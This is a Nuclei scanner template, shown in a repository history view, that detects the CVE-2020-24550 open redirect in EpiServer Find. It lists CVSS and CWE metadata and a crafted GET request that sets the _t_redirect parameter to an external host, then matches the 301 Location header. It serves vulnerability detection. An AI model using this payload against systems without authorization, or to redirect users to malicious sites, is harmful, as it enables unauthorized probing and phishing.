nuclei-templates/cves/2020/CVE-2020-24550.yaml

35 lines
1.1 KiB
YAML
Raw Normal View History

2021-04-02 08:41:43 +00:00
id: CVE-2020-24550
info:
name: EpiServer Find <13.2.7 - Open Redirect
2021-04-02 08:41:43 +00:00
author: dhiyaneshDK
severity: medium
description: EpiServer Find before 13.2.7 contains an open redirect vulnerability via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://labs.nettitude.com/blog/cve-2020-24550-open-redirect-in-episerver-find/
- https://nvd.nist.gov/vuln/detail/CVE-2020-24550
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-24550
cwe-id: CWE-601
tags: cve,cve2020,redirect,episerver
2021-04-02 08:41:43 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://interact.sh'
2021-04-02 09:01:43 +00:00
2021-04-02 08:41:43 +00:00
matchers-condition: and
matchers:
- type: word
part: header
2021-04-02 08:41:43 +00:00
words:
- "Location: https://interact.sh"
2021-04-02 08:41:43 +00:00
- type: status
status:
- 301
# Enhanced by md on 2022/10/13